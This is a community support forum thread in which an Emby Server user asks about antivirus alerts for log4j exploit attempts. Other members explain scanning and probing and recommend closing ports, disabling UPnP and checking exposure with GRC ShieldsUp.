musicmafia 38 Posted May 21, 2023 Posted May 21, 2023 I am not very tech savvy but my anti-virus program has flagged 8 of these in the last 3 weeks. I have XXXX out some data. Can anyone explain what is going on? Time;Event;Action;Source;Target;Protocol;Rule/worm name;Application;Hash;User Security vulnerability exploitation attempt; Blocked; Source: XX.XXX.XX.XXX:XXXX (unknown, different from my IP) Target: XXX.XXX.X.XX:XXXX (Target is my IP) TCP JAVA/Exploit.CVE-2021-44228 C:\Users\XXXXXXXXX\AppData\Roaming\Emby-Server\system\EmbyServer.exe XXXX026FDF550198XXXXA3385CDB159E1XXXXXX
Gilgamesh_48 1240 Posted May 21, 2023 Posted May 21, 2023 I do not know that this is the case but every time something "flags" Emby it has turned out to be a false positive. That is what I expect this time. I would contact the anti-virus company you are using and tell them about this report.
musicmafia 38 Posted May 21, 2023 Author Posted May 21, 2023 4 minutes ago, Gilgamesh_48 said: I do not know that this is the case but every time something "flags" Emby it has turned out to be a false positive. That is what I expect this time. I would contact the anti-virus company you are using and tell them about this report. That's what I am thinking as well, probably a false flag, but thought I should post to be on the safe side, since most people here know a lot more about this stuff than I do.
Luke 42078 Posted May 21, 2023 Posted May 21, 2023 Hi, can you please attach the emby server log? Thanks. 1
TeamB 2438 Posted May 22, 2023 Posted May 22, 2023 4 hours ago, musicmafia said: JAVA/Exploit.CVE-2021-44228 its the log4j exploit, it looks like your firewall picked up the attack and stopped it. this looks like it was an external attack on your IP to the port Emby is running on.
musicmafia 38 Posted May 22, 2023 Author Posted May 22, 2023 Well, that sounds scary, and it has happened 8 times in 3 weeks. At least my firewall stopped it. Is there anything I can do on my end?
musicmafia 38 Posted May 22, 2023 Author Posted May 22, 2023 I looked at the dates the first attempts started and that correlates with me setting up my new smart TV, which is where I watch my movies from Emby.
Luke 42078 Posted May 22, 2023 Posted May 22, 2023 1 hour ago, musicmafia said: I looked at the dates the first attempts started and that correlates with me setting up my new smart TV, which is where I watch my movies from Emby. That could actually be your TV sending out upnp requests to Emby Server. @TeamBare you positive that you think it;s external? Anyway, you could try turning off Emby Server DLNA features, then restart the server and the TV, and see if the flagging stops.
musicmafia 38 Posted May 22, 2023 Author Posted May 22, 2023 10 minutes ago, Luke said: .......Anyway, you could try turning off Emby Server DLNA features, then restart the server and the TV, and see if the flagging stops. Thanks Luke. Here's what I have now. I don't think I clicked anything there, so I assume these are default settings? So I should untick all? Should I set my account as default user (it's blank now)?
Luke 42078 Posted May 22, 2023 Posted May 22, 2023 Granted it won't stop your TV from sending out upnp queries, it will just stop the server from responding to them. So see if that helps. 1
TeamB 2438 Posted May 22, 2023 Posted May 22, 2023 1 hour ago, Luke said: That could actually be your TV sending out upnp requests to Emby Server. @TeamBare you positive that you think it;s external? Anyway, you could try turning off Emby Server DLNA features, then restart the server and the TV, and see if the flagging stops. no I dont, given that the original info was sensoued Source: XX.XXX.XX.XXX:XXXX (unknown, different from my IP) Target: XXX.XXX.X.XX:XXXX (Target is my IP) I assumed (unknown, different from my IP) meant external. However the log4j vulnerability is usually triggered remotly to run local code on a system. https://logging.apache.org/log4j/2.x/security.html It exploits a vulnerability in some special lookup capabilities in the log4j library and that allowed an attacher to get log4j to download and run code. Due to log4j being so widespread and in so many systems and IOT devices there are a lot of scanners out there that either try to exploit it or are just scanning for it so thy can sell the IP on a list or vulnerable systems. 1 1
musicmafia 38 Posted May 22, 2023 Author Posted May 22, 2023 Geez, this is sounding scarier by the day. Now my IP may be on a list as vulnerable? Is there anything more I can do to protect myself? @TeamBSource IP is 95.214.55.244 (which I looked up online, says Warsaw, Poland). All the attempts except the last one were made from that IP. The last attempt showed my own IP as the source AND target. Now my security is flagging with the message below. Does this mean they are cloning my IP and trying to exploit that way?
TeamB 2438 Posted May 23, 2023 Posted May 23, 2023 (edited) 1 hour ago, musicmafia said: Now my IP may be on a list as vulnerable? your system might not be vulnerable to the log4j exploit, think of this as someone knocking on your door to see if you are home or not. Only if your system is vulnerable whould that move to the next step. Not sure about the last warning, it could be an IP spoof action or it could be you have been compramised. Or it could just be a weird DHCP glitch that has assigned one of your local devices the same IP address which can happen but usually resolves itself resonable quickly. Edited May 23, 2023 by TeamB 1
musicmafia 38 Posted May 23, 2023 Author Posted May 23, 2023 Although the first 8 attempts targeted the Emby port, it seems to change every couple days. Today a new one started: ARP Cache Poisoning attack. Both source and target IP appear to be my IP except the last two digits. Since it has nothing to do with Emby I'll stop posting here and try to get help from Eset. Thanks again.
rbjtech 5284 Posted May 24, 2023 Posted May 24, 2023 (edited) On 23/05/2023 at 01:14, TeamB said: your system might not be vulnerable to the log4j exploit, think of this as someone knocking on your door to see if you are home or not. Only if your system is vulnerable whould that move to the next step. Any internet facing IP is vulnerable to 'probing' and there will be millions of probes happening every second of every day across the internet - that's unfortunately how it is. The important bit is this - any OPEN port is where the remote connection will have the connection opportunity and it will ATTEMPT a known vulnerability IF something is listening on that port. If you are getting lots of alerts, I would check that only the essential ports are open on your router - and ensure upnp is turned off. If you are only using emby for remote access, then using the standard port, only 8096 (for http) and/or 8920 (for https) should be open. If other ports are open (80, 443) etc, then this is most likely why you are seeing 'attempts' because these are common ports and frequently probed. To reiterate, these are highly unlikely to be 'targetted' attempts - they are just run of the mill 'port scans' - but do check the 'open' port status of your router. Something like grc's port scanner will verify the 'open' ports - from a known source. (https://www.grc.com/x/ne.dll?bh0bkyd2) Edited May 24, 2023 by rbjtech
Guest Posted May 24, 2023 Posted May 24, 2023 (edited) I like GRC's ShieldsUp! for a quick and free external port exposure check. I've used it for years (almost 2 decades now), especially every time I'm replacing or reconfiguring an internet facing device. https://www.grc.com/shieldsup Click proceed to accept the agreement then click all service ports and explore the results. Edit: Bear in mind this isn't actually scanning all ports and checking all protocols but it's a good place to start. Edited May 24, 2023 by andrewds
rbjtech 5284 Posted May 24, 2023 Posted May 24, 2023 20 minutes ago, andrewds said: I like GRC's ShieldsUp! for a quick and free external port exposure check. I've used it for years (almost 2 decades now), especially every time I'm replacing or reconfiguring an internet facing device. https://www.grc.com/shieldsup Click proceed to accept the agreement then click all service ports and explore the results. Edit: Bear in mind this isn't actually scanning all ports and checking all protocols but it's a good place to start. You can add any ports you like in a custom port scan - so by adding 8096/8920, you can actually see if emby is listening (same as 'canyouseeme' etc).
Guest Posted May 24, 2023 Posted May 24, 2023 Ideally what you'll see is that all ports including even emby are stealth. I for example only expose my server instance externally to a couple of ips for friends and family, so from the perspective of the GRC scan the ports will appear closed or ideally 'stealth' as in not respond at all. This does mean that if my friends or family change locations, their equipment reboots, or their internet provider does some kind of maintenance their wan IP address can change and they'll have to give it to me again so I can update my config to restore their access. But, for me I prefer that periodic inconvenience to increase security. If you see an open port that means your emby server instance is responding to requests from the open Internet, which is when you'll find yourself subject to probing for vulnerabilities. What you can do to mitigate this depends on your equipment and comfort level. I think a lot of people just rely on a reverse proxy for their setups.
Guest Posted May 25, 2023 Posted May 25, 2023 @musicmafiawe haven't heard from you in this thread for a couple of days. Please make sure you review https://emby.media/support/articles/advisory-23-05.html, especially given the context in this conversation and the emerging details described in that advisory you really need to evaluate your configuration and secure your server.
musicmafia 38 Posted May 26, 2023 Author Posted May 26, 2023 (edited) To @andrewds and All: Wow, for some reason I didn't receive notifications that all of you had responded here! Thanks so much for all the help! Again, I don't know much about this stuff, but I did notice that the source and target IP flagged as the ARP Cache Poisoning Attack was the IP of my new smart TV. That led me to search threads related more specifically to how smart TV's can be the source of these type issues. In the last few days I had recently taken the TV off wi-fi and instead switched to ethernet (via powerline adapters). I read that someone else experienced some similar flags when their TV was trying to connect to ethernet and wi-fi simultaneously. I realized that, although I was now connecting via ethernet, I had not removed the wi-fi as an option. So I removed the old wi-fi option from the network options on the TV and monitored my AV program closely, and low and behold, knock on wood, I have had no further flags from Eset in the last two days! (Before I was getting several per day). I am hoping this solved the problem. I just now saw all your messages and I just used the GRC Shiled'sUP and am pleased to report it said this: I take it everything looks proper now and I don't need to change anything with my router? Thanks again! Edited May 26, 2023 by musicmafia
Guest Posted May 26, 2023 Posted May 26, 2023 (edited) Hello @musicmafia, I'm about to walk out the door so will be brief. Starting with checking out upnp is good but you need to run a port scan as well. And per the big red security advisory make sure at the very least that all of your user accounts require password for local login. Edited May 26, 2023 by andrewds
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now